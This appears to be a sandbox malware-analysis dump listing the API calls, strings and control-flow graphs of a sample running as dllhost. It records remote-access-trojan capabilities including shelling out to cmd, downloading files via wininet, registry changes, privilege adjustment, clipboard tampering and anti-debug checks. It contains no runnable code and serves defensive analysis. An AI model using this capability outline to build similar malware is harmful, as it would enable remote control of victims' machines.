                    • lstrcatA.KERNEL32(032B0E18,032ABCD4,?,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3EAB
                      • Part of subcall function 032A3340: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,032AF5F0,00000000,?,?,032A3E3E), ref: 032A3351
                    • lstrcatA.KERNEL32(032B0E18,032ABBF4,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3E57
                    • lstrcatA.KERNEL32(032B0E18,032AB7A4,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3E63
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: lstrcat$CreateSnapshotToolhelp32_memset
                    • String ID:
                    • API String ID: 2821338896-0
                    • Opcode ID: 5580510bc7785798f016e4c78e0f54cdb0abf3d265d06c857654088a41d41ba7
                    • Instruction ID: 8c75da78d3dc8071ea608bcb1723e3273a1d34689d7b4cb746cce15fa8b7f0a1
                    • Opcode Fuzzy Hash: 5580510bc7785798f016e4c78e0f54cdb0abf3d265d06c857654088a41d41ba7
                    • Instruction Fuzzy Hash: D211062AA20B1A6FDE54DAAC9E41A5B77A8DF44784B098865E91497201F7B0ACD0C3E0

                    Control-flow Graph

                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 032A71A1
                    • InitializeCriticalSection.KERNEL32(?), ref: 032A71AE
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A71B9
                    • __time64.LIBCMT ref: 032A71DC
                      • Part of subcall function 0329269A: GetSystemTimeAsFileTime.KERNEL32(032A4745,?,?,?,032A4745,?,?,?), ref: 032926A5
                      • Part of subcall function 0329269A: __aulldiv.LIBCMT ref: 032926C5
                      • Part of subcall function 03292667: __getptd.LIBCMT ref: 0329266C
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
                    • String ID:
                    • API String ID: 2538592855-0
                    • Opcode ID: ac1021962c8507dd278bfc7ddbbb0081ac2468f16dde8277494034bc7bbe5b7b
                    • Instruction ID: df981e08ab222f54e105b31f29dce2aa638b98982d04c5384247a7c5b76a88d6
                    • Opcode Fuzzy Hash: ac1021962c8507dd278bfc7ddbbb0081ac2468f16dde8277494034bc7bbe5b7b
                    • Instruction Fuzzy Hash: 1C11B6B0911B08DFD760DF6A9888A56FBE8BB08700F508A2EA59E87A41D730A544CB54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 358 32a7ba0-32a7bae 359 32a7bb8-32a7bc2 358->359 360 32a7bb0-32a7bb7 358->360 361 32a7bca-32a7c19 call 3292470 VirtualAlloc 359->361 362 32a7bc4 359->362 365 32a7c1b-32a7c23 361->365 366 32a7c24-32a7c29 361->366 362->361 367 32a7c2b-32a7c2d 366->367 368 32a7c2f-32a7c34 366->368 369 32a7c45-32a7c4a 367->369 368->369 370 32a7c36-32a7c42 call 3298da0 368->370 372 32a7c5e-32a7c70 369->372 373 32a7c4c-32a7c5a VirtualFree 369->373 370->369 373->372
                    APIs
                    • __floor_pentium4.LIBCMT ref: 032A7BD6
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032A7C0D
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AllocVirtual__floor_pentium4
                    • String ID:
                    • API String ID: 4174053956-0
                    • Opcode ID: 083c71f0ab56f7a97007e19abc9c323c89d85be2cebfa8b98b9df6d7b7d384f7
                    • Instruction ID: f68b5cdbecba516c38e40e2e2b0171661e9c18363f200fcb619c4872d0d92b4e
                    • Opcode Fuzzy Hash: 083c71f0ab56f7a97007e19abc9c323c89d85be2cebfa8b98b9df6d7b7d384f7
                    • Instruction Fuzzy Hash: BD212231718B049BD750DF6EE98462BF7E8FF80B21F044D2DF999C2280E631D8448746

                    Control-flow Graph

                    APIs
                      • Part of subcall function 032A7880: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
                      • Part of subcall function 032A7880: socket.WS2_32 ref: 032A78B6
                    • Sleep.KERNEL32(0000EA60,00000000), ref: 032A4405
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 032A443E
                    • _memset.LIBCMT ref: 032A4469
                    • _strncpy.LIBCMT ref: 032A447F
                    • GetTickCount.KERNEL32 ref: 032A44A4
                    • GetTickCount.KERNEL32 ref: 032A44B5
                    • setsockopt.WS2_32 ref: 032A44F1
                    • CancelIo.KERNEL32(?), ref: 032A44FF
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 032A450F
                    • closesocket.WS2_32(?), ref: 032A451D
                    • SetEvent.KERNEL32(?), ref: 032A452B
                    • Sleep.KERNEL32 ref: 032A4547
                    • Sleep.KERNEL32(00000BB8), ref: 032A4561
                    • CloseHandle.KERNEL32(?), ref: 032A457A
                    • GetTickCount.KERNEL32 ref: 032A469C
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedReset_memset_strncpyclosesocketsetsockoptsocket
                    • String ID:
                    • API String ID: 1535685871-0
                    • Opcode ID: 9cf69780d4dec1c18eeccddf2c9c45e4b01cb4384cf84d7fdc279a8995051ff7
                    • Instruction ID: 22b479a5b6d4822b01c0a835c40fbc61a3de855b647dd4d80ace51556eefafa8
                    • Opcode Fuzzy Hash: 9cf69780d4dec1c18eeccddf2c9c45e4b01cb4384cf84d7fdc279a8995051ff7
                    • Instruction Fuzzy Hash: 62F02B75628740CFDB28EF59F44039AB3E4FF84340F40445DD90987240DBB19484CB42

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 415 32b714d-32b715b 416 32b7199-32b719e 415->416 417 32b715d-32b7168 LoadLibraryA 416->417 418 32b71a0-32b71a2 416->418 420 32b71aa-32b71ac 417->420 421 32b716a-32b716f 417->421 419 32b71a5-32b71a9 418->419 420->419 422 32b7190-32b7194 421->422 423 32b7171 422->423 424 32b7196 422->424 425 32b7178-32b717b 423->425 426 32b7173-32b7176 423->426 424->416 427 32b717d-32b717f 425->427 426->427 427->420 428 32b7181-32b7189 427->428 428->420 430 32b718b-32b718d 428->430 430->422
                    APIs
                    • LoadLibraryA.KERNELBASE(0000C087,?,?,?,00000000,032B70C7,?,?,?,?,?), ref: 032B7160
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.00000000032B7000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_32b7000_dllhost.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction ID: 02a30c77859aa576e29d061f8d571bef75d6347e0ff9a39ccb5e77dafaa3ffa7
                    • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction Fuzzy Hash: E3F0D6B26393134BEB10CD5CCC405B7B3BCAEC1AE57090428E952D7201E261D8818770
                    APIs
                    • DisableThreadLibraryCalls.KERNEL32(?,?,?,03293B61,?,?,?,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032A7D5E
                      • Part of subcall function 032A46E0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 032A4716
                      • Part of subcall function 032A46E0: ExitProcess.KERNEL32 ref: 032A471E
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
                    • String ID:
                    • API String ID: 825726465-0
                    • Opcode ID: 9bb6433fb13a4fd32144e4b9bb295bc148f664e226595a6c26f6c3e66b411eb2
                    • Instruction ID: 6b7b83632492194bdd0b34bfc1b9f3d26a0aec7fbe60250994534e3fb7a36f8a
                    • Opcode Fuzzy Hash: 9bb6433fb13a4fd32144e4b9bb295bc148f664e226595a6c26f6c3e66b411eb2
                    • Instruction Fuzzy Hash: 36D0C936025E2897CB01BF5DB445ADE77EC9B18790F008042F9049B340D7B4F9C19BD9
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,000000FF,?,0329A29F,00000011,00000000,?,03294583,0000000D,032AC540,00000008,0329467A,00000000), ref: 0329764E
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 1212a5378d99a791f33ed506674f684420bfbffab377ae6af48662059c61bcfe
                    • Instruction ID: 72b1e8e9b565bea4246a8c8e812b5457f9b42b53b210e3c848d568d4c9a129ae
                    • Opcode Fuzzy Hash: 1212a5378d99a791f33ed506674f684420bfbffab377ae6af48662059c61bcfe
                    • Instruction Fuzzy Hash: 7EC09B71741B0557E75557357C5E74525945B49B42F2040297207D95C4D79054909604
                    APIs
                    • GetTickCount.KERNEL32 ref: 032A6815
                    • _memset.LIBCMT ref: 032A69C2
                    • wsprintfA.USER32 ref: 032A69D9
                    • ShellExecuteA.SHELL32(00000000,open,cmd,?,00000000,00000000), ref: 032A69FA
                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 032A6A4E
                    • Sleep.KERNEL32(000003E8), ref: 032A6AA5
                    • OpenClipboard.USER32(00000000), ref: 032A6B1A
                    • EmptyClipboard.USER32 ref: 032A6B24
                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 032A6B31
                    • GlobalLock.KERNEL32(00000000), ref: 032A6B3B
                    • GlobalUnlock.KERNEL32(00000000), ref: 032A6B4E
                    • SetClipboardData.USER32(00000001,00000000), ref: 032A6B57
                    • CloseClipboard.USER32 ref: 032A6B5D
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Clipboard$Global$ExecuteShell$AllocCloseCountDataEmptyLockOpenSleepTickUnlock_memsetwsprintf
                    • String ID: /c %s$CopyC$Enable$False$Remark$cmd$open
                    • API String ID: 195233984-497360582
                    • Opcode ID: bbdcaf34ff3db04e4c5145a9a487320e8c876d9685bd7c7bde62f4a2c4fc7204
                    • Instruction ID: c62c5087f32bf2ebfe3b2d5fa5c1bda4fd076b8b47f980addef07d60c5f32294
                    • Opcode Fuzzy Hash: bbdcaf34ff3db04e4c5145a9a487320e8c876d9685bd7c7bde62f4a2c4fc7204
                    • Instruction Fuzzy Hash: 87912936724B049BD620FB6DB845B6FB794EB95321F04442FEA8D8F280CBB154C5C7A2
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 03293D15
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03293D2A
                    • UnhandledExceptionFilter.KERNEL32(032A9370), ref: 03293D35
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 03293D51
                    • TerminateProcess.KERNEL32(00000000), ref: 03293D58
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 72af5334c9e9eee24e4a8b54ac16748f7402351930f5060302953ff3a463d643
                    • Instruction ID: 0a530285c4f84cb1e60dd33708c1676c72c2217b96fa8ddbec3b7bffb0e5893b
                    • Opcode Fuzzy Hash: 72af5334c9e9eee24e4a8b54ac16748f7402351930f5060302953ff3a463d643
                    • Instruction Fuzzy Hash: 8021BEB8510A04EFD710FF25FAAC6847BF4BB0C711F10C85AE90987649E7B85481CF05
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294697
                    • __mtterm.LIBCMT ref: 032946A3
                      • Part of subcall function 0329436E: DecodePointer.KERNEL32(00000005,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329437F
                      • Part of subcall function 0329436E: TlsFree.KERNEL32(0000000E,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294399
                      • Part of subcall function 0329436E: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329A165
                      • Part of subcall function 0329436E: _free.LIBCMT ref: 0329A168
                      • Part of subcall function 0329436E: DeleteCriticalSection.KERNEL32(0000000E,?,?,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329A18F
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 032946B9
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 032946C6
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 032946D3
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 032946E0
                    • TlsAlloc.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294730
                    • TlsSetValue.KERNEL32(00000000,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329474B
                    • __init_pointers.LIBCMT ref: 03294755
                    • EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294766
                    • EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294773
                    • EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294780
                    • EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329478D
                    • DecodePointer.KERNEL32(Function_000044F2,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032947AE
                    • __calloc_crt.LIBCMT ref: 032947C3
                    • DecodePointer.KERNEL32(00000000,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032947DD
                    • GetCurrentThreadId.KERNEL32 ref: 032947EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 9d2b010a9775deba8f881f321a1dca64d71635a866371bf3727bcc798eab43dd
                    • Instruction ID: e48cb312f5c967e0acc131a5236ffcbf8121fbff8b5b0a0a75470760ea7bb67a
                    • Opcode Fuzzy Hash: 9d2b010a9775deba8f881f321a1dca64d71635a866371bf3727bcc798eab43dd
                    • Instruction Fuzzy Hash: E7315E30920F15EFEB12FF7ABD0C6497FA4AB49B247248227E410D6148D77994C2DF90
                    APIs
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 032A30CE
                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 032A30E2
                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 032A30ED
                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 032A30F8
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3102
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A3111
                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 032A316B
                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 032A3177
                    • CloseHandle.KERNEL32(?), ref: 032A3187
                    • FreeLibrary.KERNEL32(00000000), ref: 032A3198
                    • FreeLibrary.KERNEL32(?), ref: 032A31A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                    • API String ID: 2887716753-2040270271
                    • Opcode ID: 6526f31fe8141371ae5eb9481dfbfeae77a92a3306a72dbafa3d3dfc29ce61df
                    • Instruction ID: 0ef57c59782d6fe8dd59de894199029322612db2fff7de578376c1cf24f6d13f
                    • Opcode Fuzzy Hash: 6526f31fe8141371ae5eb9481dfbfeae77a92a3306a72dbafa3d3dfc29ce61df
                    • Instruction Fuzzy Hash: F131A171E1070CAFDF10EBB99C49FAFBBB8AF48701F014059E915F2141CAB49840CBA0
                    APIs
                    • LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 032A3788
                    • GetProcAddress.KERNEL32(00000000), ref: 032A3791
                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 032A37C4
                    • GetProcAddress.KERNEL32(00000000), ref: 032A37C7
                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 032A37E2
                    • GetProcAddress.KERNEL32(00000000), ref: 032A37E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
                    • API String ID: 2574300362-3168299024
                    • Opcode ID: de4bb7b1b7bd259de1bb510e4e98d4676d53cade85d4ed063e29833280b0627b
                    • Instruction ID: 6579b947ecb0ffd7ede3924adeca25df75234e5e1383c9dd8694a504e6155354
                    • Opcode Fuzzy Hash: de4bb7b1b7bd259de1bb510e4e98d4676d53cade85d4ed063e29833280b0627b
                    • Instruction Fuzzy Hash: E431E1B2D0131CABCF10DFE9D985AEEBBB8FF48700F108519E505AB244DA745A05CBA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                    • API String ID: 609515672-33419044
                    • Opcode ID: f2cf83f4ff2dd70802e06ee5f52cd4aa5293048e549b1d692cccfc921f38fa02
                    • Instruction ID: 40d5c9015f8f246738df998553f03cf545139630e19516fb91c39de7cbfa4c77
                    • Opcode Fuzzy Hash: f2cf83f4ff2dd70802e06ee5f52cd4aa5293048e549b1d692cccfc921f38fa02
                    • Instruction Fuzzy Hash: D851247596471DABEB20D7689C45FEB77789B05B00F1044C9EA49AE081E7F097C8CFA1
                    APIs
                    • DeleteFileA.KERNEL32(032A5853,00000000,00000001,?), ref: 032A6C99
                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 032A6CB2
                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 032A6CC6
                    • FreeLibrary.KERNEL32(00000000), ref: 032A6CE4
                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 032A6D03
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 032A6D36
                    • _memset.LIBCMT ref: 032A6D5E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 032A6D6C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032A6DA2
                    • CloseHandle.KERNEL32(?), ref: 032A6DB8
                    • Sleep.KERNEL32(00000001), ref: 032A6DC0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 032A6DCC
                    • FreeLibrary.KERNEL32(00000000), ref: 032A6DE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
                    • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                    • API String ID: 455779405-4269851202
                    • Opcode ID: 0df92125df0fdbc9d775b404f7216ff67c6aa503fcaf7187ce07d0652f3d8329
                    • Instruction ID: 8a0ae210a84727edc2fa2e025e22430e491152f1015d1f3764e8aadf3a380c30
                    • Opcode Fuzzy Hash: 0df92125df0fdbc9d775b404f7216ff67c6aa503fcaf7187ce07d0652f3d8329
                    • Instruction Fuzzy Hash: 834182B561061CAFDB20EB699C85FDEB378AB84740F048199B709F6141CBB45EC58F68
                    APIs
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,1D2AA39B), ref: 032A4933
                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 032A494A
                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 032A4954
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 032A495F
                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 032A4967
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A496F
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A497A
                    • lstrlenA.KERNEL32(?), ref: 032A49CB
                    • FreeLibrary.KERNEL32(00000000), ref: 032A49FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoadlstrlen
                    • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$Time
                    • API String ID: 320228506-4066504548
                    • Opcode ID: e401fb231bd80c79b9c5d2e07e2797bd011d8e4d7ad39e88c5b70f42f5f65b25
                    • Instruction ID: 63c56a015ee7d039e9d5d960da0ac8065b1f8a3ccf7d30ed74cf147b4872406e
                    • Opcode Fuzzy Hash: e401fb231bd80c79b9c5d2e07e2797bd011d8e4d7ad39e88c5b70f42f5f65b25
                    • Instruction Fuzzy Hash: D9316B71A50B19BFDB10EBA9DC46FEEBBB8EF48B00F104115F911E6241D7B4A9808B64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Version_memset_strncpy
                    • String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
                    • API String ID: 1449955169-2950701659
                    • Opcode ID: 8f2d6d2cb4f5e91fb1c83a6d4ebd1db49edbb20ed2783ca19ca92e54dbb1825e
                    • Instruction ID: 21a3816924f994e4a842fa6eabe11f8b1b69e2f268878fe7447170fbd3db7ab3
                    • Opcode Fuzzy Hash: 8f2d6d2cb4f5e91fb1c83a6d4ebd1db49edbb20ed2783ca19ca92e54dbb1825e
                    • Instruction Fuzzy Hash: C0312338EB8B0BAFDF30C52C9C52F6D7269AB01B00F5445D6E71DE9582D9B045CACA07
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s\%s$ARPD$PluginMe$getDllName$isARDll$isCSDll
                    • API String ID: 0-3715897580
                    • Opcode ID: eddf7148fc3448a0aef7dc00eeb05c1dbb12ece34361df799012813d57b9561d
                    • Instruction ID: 1295184e82bc5c3163f649e8d1a727bacab458c940965ca6cc5f678eb4d38441
                    • Opcode Fuzzy Hash: eddf7148fc3448a0aef7dc00eeb05c1dbb12ece34361df799012813d57b9561d
                    • Instruction Fuzzy Hash: C8B11B75D20B199FDF20DB689C40BEEB7789B44711F0845E5E508AB280EBB56AC4CF91
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A320A
                    • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 032A3220
                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 032A322E
                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 032A323C
                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A324A
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3257
                    • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 032A3267
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
